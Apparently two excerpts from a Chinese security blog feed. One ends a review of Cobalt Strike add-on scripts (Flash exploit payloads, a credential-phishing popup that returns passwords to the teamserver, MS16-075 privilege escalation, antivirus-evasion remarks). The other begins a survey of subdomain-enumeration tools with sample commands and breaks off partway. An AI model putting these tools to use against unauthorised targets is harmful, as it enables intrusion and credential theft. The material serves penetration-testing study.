师傅的<strong>CVE-2018-15982</strong> payload插件，跟前面的两个Flash插件使用方式基本相同，不多介绍了。<br/>地址：<a href="https://github.com/scanfsec/CVE-2018-15982" target="_blank">https://github.com/scanfsec/CVE-2018-15982</a><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.49454545454545457" data-s="300,640" style="" data-type="png" data-w="275" src="https://wechat2rss.xlab.app/img-proxy/?k=148a8499&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUWST71aRWLkpyYb9rBSSpn5DTgUricKLZxQ6dicAMriaFbegQ0S2hnpHBg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>28、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">直接载入 <strong>custom_payload_generator.cna</strong> ，生成自定义payload的时候可以自己选择，上面有介绍过一个相似的多种payload的生成脚本，不过那个没得选择，一键就是生成一坨。这里的 payload_generator  支持自己选择的同时也会给出大体的执行和使用方式，用户体验比较好，目前为止payload的效果也还比较好。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/offsecginger/AggressorScripts" target="_blank">https://github.com/offsecginger/AggressorScripts</a><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3701067615658363" data-s="300,640" style="" data-type="png" data-w="281" src="https://wechat2rss.xlab.app/img-proxy/?k=b9f36b9f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUy7lec3YZhLVn4NcBKJtnTDsBr0PuqUkb3I92Eib3znDDnzu7gWmJbBA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7605321507760532" data-s="300,640" style="" data-type="png" data-w="451" src="https://wechat2rss.xlab.app/img-proxy/?k=5df02516&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUhl0nA4hTTPENiarDRbbk9fUkichibBevZhuibnFoNdckljhsm7sd8mpbOA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>29、</strong></span><strong><span style="font-size: 15px;color: rgb(66, 63, 63);">cs-magik</span></strong><span style="font-size: 15px;color: rgb(66, 63, 63);"> 借助redis 来实现事件通道和作业队列，没有搭建测试，可以自己参照说明尝试。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/tomsteele/cs-magik" target="_blank">https://github.com/tomsteele/cs-magik</a><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>30、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">nopowershell是一个基于C＃用来替代PowerShell的项目，<strong>NoPowerShell.cna</strong> 只是一个用来注册命令的壳，该条命令是&#34;nps&#34;。然后整个项目依托于NoPowerShell.exe，所以需要提前在项目的releases下载或者自己编译NoPowerShell.exe 然后放到cs的/script 目录下，注意不是cna脚本下的/script 目录，然后众多命令都在介绍当中了。<br/>个人认为作者的出发点是好的，但是这种实现方式存在一个比较致命的问题，如果AV把特征码打在程序一个很瓶颈的位置，整个项目基本就废掉了，鸡蛋都在一个篮子里，还要花精力去免杀。<br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/bitsadmin/nopowershell" target="_blank">https://github.com/bitsadmin/nopowershell</a><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5221932114882507" data-s="300,640" style="" data-type="png" data-w="1915" src="https://wechat2rss.xlab.app/img-proxy/?k=86f23ecb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUz841Fk3hkdA2VjFfbic2Qe2zdzY9TURxXFxDZpjPpiavSA4cNOBpAxicg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.215200683176772" data-s="300,640" style="" data-type="png" data-w="1171" src="https://wechat2rss.xlab.app/img-proxy/?k=ae690879&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNURibObibgoJicqSC79jQUa7orAjcOyuicqGjleqaYUfx8SSWfyNjhicg7kIg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>31、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>Invoke-CredentialPhisher</strong> 是一个比较骚的项目，作者通过PSH实现了Windows几种场景下的钓鱼弹窗，诱导目标输出账号密码之后会带回teamserver，win7测试有点问题，但是win10效果比较好，窗口效果很逼真。作者博客有一篇文章专门介绍撰写思路，可以参考。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/SpiderLabs/SharpCompile" target="_blank">https://github.com/SpiderLabs/SharpCompile</a><br/>文章地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://blog.fox-it.com/2018/08/14/phishing-ask-and-ye-shall-receive/" target="_blank">https://blog.fox-it.com/2018/08/14/phishing-ask-and-ye-shall-receive/</a><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7645569620253164" data-s="300,640" style="" data-type="png" data-w="395" src="https://wechat2rss.xlab.app/img-proxy/?k=cefa9766&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUiarURKkWCucSUmrsZSJetfDBdgYjewuy3VQibZhoKEgOXoPNI9Fj0LFg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>outlook弹窗效果，点击就会要求输入相应凭证：<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5298507462686567" data-s="300,640" style="" data-type="png" data-w="402" src="https://wechat2rss.xlab.app/img-proxy/?k=d70a40f5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUyzbqWp4vbeAQwgKpdq7rqzzKaXToicT6U8hmCEl6FXJVuL1Kyrvg7sA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>将凭证带回teamserver的效果：<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.19584837545126355" data-s="300,640" style="" data-type="png" data-w="1108" src="https://wechat2rss.xlab.app/img-proxy/?k=c0756376&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUkW7EWhkrxguYeN9WykmTQIc9aUDiaic4XhT4MFrhiaUJ2wG7HSkgyicf0g%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>32、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>SharpCompile </strong>项目可以实现在靶机上实时编译和执行C＃，右键菜单的图形界面有以下两种方式，命令行中注册了下图中的两条命令。该脚本需要提前在cna中配置server和tmp目录。另外作者没提到的关于靶机.NET版本的问题也是实际操作中需要注意的细节。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/SpiderLabs/SharpCompile" target="_blank">https://github.com/SpiderLabs/SharpCompile</a><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.517162471395881" data-s="300,640" style="" data-type="png" data-w="437" src="https://wechat2rss.xlab.app/img-proxy/?k=dc04fdcc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUhKvDDZ9svzA3a9mbgPibxCktCxv6PspOaYN6fQHlnFWPo6G6qKZGZzQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.10891089108910891" data-s="300,640" style="" data-type="png" data-w="505" src="https://wechat2rss.xlab.app/img-proxy/?k=5dd2878d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUdDJxKT1MpViaBWMUHE4m9RAmlqGVt7I8DUnv7ejqDP3YYANzcZnr1hQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>33、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>reflectivepotato</strong> 是对ms16075（烂土豆）的cna脚本实现，使用方法直接一把梭右键elevate，脚本通过加载dll的方式进行漏洞利用。不过在win7靶机上试了下如果开着防火墙会拦，另外rundll32会崩，可以自己编译测试下。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/realoriginal/reflectivepotato" target="_blank">https://github.com/realoriginal/reflectivepotato</a><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5794621026894865" data-s="300,640" style="" data-type="png" data-w="409" src="https://wechat2rss.xlab.app/img-proxy/?k=f4c232b3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUTC3ZhjGkqtaIGbicVwbGwJ1OdOq7szztTnyBlyASqZdl0ZA7I7VsRNQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="font-size: 18px;color: rgb(0, 0, 0);"><strong>三、写在最后</strong></span><br/></p><p><span style="color: rgb(66, 63, 63);font-size: 14px;"><br/></span></p><p><span style="font-size: 14px;color: rgb(136, 136, 136);">之前有一段特别忙碌的时间，有很明确的方向，所以人在那段时间的状态就像录音机里的磁带一样循着轨迹来来回回，虽然总是重复，但是至少有奔头。后来磁带卷像是被抠出来丢在一边，滚了两步就倒在地上，像濒死的苍蝇又被掐掉了头，混吃等死。这是前因。<br/> <br/>我是个特别不理性的人，受人和事的影响总是特别大，经常会做出一些冲动和不合逻辑的事。自从我从yhg那里学会了说对不起，感觉自己就总是在说对不起，也不知道到底欠了这个世界究竟多少人情。我以为人生是个迎来送往的过程，假设活着是一场修行，接受苦难和送别过去能概括一个人修行的大部分内容。技术和认知的提升是外在的修饰，知行合一还需要一个人对自己内在的雕琢。什么时候能看的清自己，也就能放得下，过得去，起得来。这是后果。<br/> <br/>后来读到K师傅的文章和另外几位师傅的文章发现很多东西在我了解之前早就写得很明白了，而且有的东西官网上有写我还要跑去问，所以说学习工作做的还是不到位，没有看到师傅们的文章就把自己的歪解写出来瞎指路。另外发的这些也几乎全部都是在没什么系统性的指导和培训的情况下自己摸索和尝试的结果，要么就是东拼西凑出来的稗官野史，所以说</span><span style="font-size: 14px;color: rgb(0, 0, 0);">这里写的东西万万要辩证着看，只做参考，只做菜鸡hjb研究的一个记录</span><span style="font-size: 14px;color: rgb(136, 136, 136);">。这是额外。</span></p><p><br/><span style="font-size: 14px;color: rgb(136, 136, 136);"></span></p><p><strong><span style="font-size: 14px;color: rgb(136, 136, 136);"><span style="font-size: 15px;color: rgb(73, 68, 68);">文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</span></span></strong></p><p><span style="font-size: 14px;color: rgb(136, 136, 136);"></span><span style="font-size: 15px;color: rgb(66, 63, 63);"> </span></p><hr style="border-style: solid;border-width: 1px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px 0px;transform: scale(1, 0.5);"/><p><br/></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="color: rgb(0, 0, 0);"><strong>参考链接</strong>：   </span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"><span style="color: rgb(0, 0, 0);"><a href="http://www.vuln.cn/6879" target="_blank">http://www.vuln.cn/6879</a></span><br/><span style="color: rgb(0, 0, 0);"><a href="https://github.com/c4bbage/aggressor-script-cn" target="_blank">https://github.com/c4bbage/aggressor-script-cn</a></span><br/><span style="color: rgb(0, 0, 0);"><a href="https://github.com/rsmudge/cortana-scripts" target="_blank">https://github.com/rsmudge/cortana-scripts</a></span></span></p></blockquote><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p>封面图片来自：getdrawings.com</p><p><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5626373626373626" style="" data-type="gif" data-w="910" src="https://wechat2rss.xlab.app/img-proxy/?k=ad978352&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUAJoJRu3J87LFgxo5w7xbyS68Zs3Vud17vHb0mPVP4rM4eO8jU2PqIQ%2F640%3Fwx_fmt%3Dgif"/></p><p><br/></p>



<p><a href="2247483977">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9448bc83&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247483977%26idx%3D1%26sn%3D6e517a17a33a17c3e283030e26fdefbf%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 01 Feb 2019 17:20:00 +0800</pubDate>
    </item>
    <item>
      <title>子域名发掘二三事</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247483827&amp;idx=1&amp;sn=12c8cf9bd9ca46e4bc6d20706ea50c7c</link>
      <description>对日常子域名挖掘手法的一个小总结</description>
      <content:encoded><![CDATA[<p>
<span>我是一只小蛇皮</span> <span>2018-03-24 18:10</span> <span style="display: inline-block;"></span>
</p>

<p>对日常子域名挖掘手法的一个小总结</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=39d79721&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppElJlIzn7GrseJf3sqRHEfFn7JywckMwhEiapgE0zeHDiaAZjyaaAHyicA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5970149253731343" style="" data-type="gif" data-w="335" src="https://wechat2rss.xlab.app/img-proxy/?k=b14bea01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppqMtOBfXEiahzasDEIc7Wq85bvzN2qIg6pjA9Kdxo5OUXbYes2zeIlPA%2F640%3Fwx_fmt%3Dgif"/><span style="font-size: 15px;color: rgb(73, 68, 68);"><br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">在日常渗透测试和src漏洞挖掘当中，明确了目标范围之后，对于有用信息的搜集一般是首先要做的工作。而对于子域名的挖掘往往是相当重要的一步，因为这在相当一定程度上决定了给定的测试范围当中攻击面的大小，所以我对常见的子域名搜集工具和手段做了一个小小的总结。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">目的一方面是方便自己熟悉多种子域名发掘手段的特点，在日后的渗透测试工作当中操作流程能更加流畅。另一方面是作为一个脚本小子对这些工具和平台做一个简单的整理分享工作，方便大家的同时也算是给工具做了点蛇皮贡献。</span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">功能基本都是拿我学校的域名简单测试的,有些比较适应国情，有些在特定网络状态下（qiang wai）才能发挥最佳的状态，故最终结果仅供参考，排名无意分高低。</span></em></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="font-size: 15px;color: rgb(73, 68, 68);">菜鸡认知毕竟有限，大师傅们有更好的思路或者发现我遗漏的点欢迎补充指正。</span></strong></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">根据依赖的技术和手法，文章大体是依据以下逻辑来写的：<br/>1、单纯依赖于字典的暴力枚举碰撞工具<br/>2、多接口综合配合暴力枚举工具<br/>3、证书反向枚举<br/>4、安全行业大数据平台<br/>5、搜索引擎<br/>6、专业安全服务商互联网扫描项目共享的数据<br/>7、第三方安全服务商相关的数据<br/>8、根据主域名爬行<br/>9、根据已有数据重组拼接碰撞工具<br/>10、其他文章中发现的不太常见的方式<br/>11、其他比较好用的方式<br/>12、额外的一些骚tips</span></p></blockquote><p style="margin: 0px 0px 1.2em !important;"><strong><span style="font-size: 18px;color: rgb(0, 0, 0);"><br/></span></strong></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="font-size: 18px;color: rgb(0, 0, 0);">0x01 单纯的字典爆破型工具</span></strong></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">最常见的属于单纯的字典爆破型工具，在高质量字典的引导下这往往是最直接干脆的手段。</span></em></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);"><br/></span></em></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">1. subDomainsBrute</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用全部字典尝试获取baidu.com的子域名并导出到1.txt：subDomainsBrute.py baidu.com  —full -o 1.txt<br/>在正常的网络环境下测试最终得到112个结果。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/lijiejie/subDomainsBrute" target="_blank">https://github.com/lijiejie/subDomainsBrute</a></span><img class="" data-copyright="0" data-ratio="0.314192849404117" data-s="300,640" style="" data-type="png" data-w="923" src="https://wechat2rss.xlab.app/img-proxy/?k=1c676afc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpp9CPVX84icWwQIRk7icPPTKsY7kLpzqnnvRBaaD6GLSvUxYa4ibic7TluXA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">2. Subdomain3</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用高线程设置获得baidu.com的子域名：brutedns.py -d baidu.com -s high<br/>支持CDN识别，支持多级域名，正常网络环境下可以得到55个结果。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/yanxiu0614/subdomain3" target="_blank">https://github.com/yanxiu0614/subdomain3</a></span><img class="" data-copyright="0" data-ratio="0.3840749414519906" data-s="300,640" style="" data-type="png" data-w="854" src="https://wechat2rss.xlab.app/img-proxy/?k=7d89dd60&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppSQiaKFGejPePDbohg0gnVrD1dxLDPeZwbaKtOjtyicfCfgQuvdvkiavSg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">3. Fierce</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用多线程枚举测试域名的子域名：Fierce -dns test.com -threads<br/>渗透测试系统例如Kali、parrot是集成了这款工具的。<br/>除了字典爆破以外，程序一开始会测试是否存在域传送漏洞吗，最终一共得到43个结果。如果后面不加 -threads参数，会慢很多。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/davidpepper/fierce-domain-scanner" target="_blank">https://github.com/davidpepper/fierce-domain-scanner</a></span><img class="" data-copyright="0" data-ratio="0.9108527131782945" data-s="300,640" style="" data-type="png" data-w="516" src="https://wechat2rss.xlab.app/img-proxy/?k=5f59f9d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppK1Ec9kxzkeDfgnzo23IrQsuFUC4uu5ibJFfibSmicC3e4tojJUs9rBwibQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">4. Subbrute</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用方法很简单，直接在脚本后面加域名名称。<br/>但是有个很有意思的问题，可能是因为我学校庙比较小，换了多个系统测试都卡住不给跑。<br/>不过爆破百度可以，拿来对大厂测试可能会比较有效。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/TheRook/subbrute/" target="_blank">https://github.com/TheRook/subbrute/</a></span><img class="" data-copyright="0" data-ratio="0.6036217303822937" data-s="300,640" style="" data-type="png" data-w="497" src="https://wechat2rss.xlab.app/img-proxy/?k=c7f260dd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppYYtibG39NOGd2x0nKlCribF8FEWM6dyvAY6Bv822AJ5FKMibx8KRhRaeA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">5. Dnsbrute</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">使用方法：程序后面 “-domain”参数跟测试域名。通过“-rate”参数控制速度。<br/>Go程序，简单的枚举功能，自动把结果写到程序目录下的“目标域名.csv”当中。<br/>自带两份字典质量个人感觉不错，默认使用5W的字典爆破。不过速度有点慢，也许是我网络环境的原因，没有等它跑完。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/Q2h1Cg/dnsbrute" target="_blank">https://github.com/Q2h1Cg/dnsbrute</a></span><img class="" data-copyright="0" data-ratio="0.6666666666666666" data-s="300,640" style="" data-type="png" data-w="924" src="https://wechat2rss.xlab.app/img-proxy/?k=80f39b43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppDbrpYttMAOT855Z7c6nR7zGhAr2C2m3xibicsAFvBw3EBMJhvsQzVuhQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">6. FuzzDomain</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">线程大了比较容易全家断网，对字典依赖性比较大。速度太慢没等结果。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/Chora10/FuzzDomain" target="_blank">https://github.com/Chora10/FuzzDomain</a></span><img class="" data-copyright="0" data-ratio="0.5256124721603563" data-s="300,640" style="" data-type="png" data-w="898" src="https://wechat2rss.xlab.app/img-proxy/?k=4846a724&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppL9GVBzicrhDVibPq9Pwd5wS3ArWRoSqvOBXFQzeU5kq2bjwKkZQHMU3w%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 18px;"><strong><span style="color: rgb(0, 0, 0);">0x02 多接口综合型枚举工具</span></strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">而目前比较受欢迎的子域名发掘工具，包括github上面的和渗透测试系统当中集成的工具，发展和更新的大方向比较倾向于更丰富接口和更多搜索引擎的集成以及对字典的分级。因为想要得到比较理想的结果单纯的依赖字典去枚举往往需要花费大量的时间，所以对于提升工具的测试结果来说，丰富接口和字典分级提升效率的同时也提升了结果质量。所以文章对于该类工具介绍的篇幅比较大，个人感觉基本涵盖日常能见到的和用的上的。同时这类综合类工具基本都具备几个小特点，比如先检测域传送漏洞和集成virustotal等常见第三方的api都是标配。</span></em></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><br/></span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">1. Anubis</span></code></pre><p><span style="font-size: 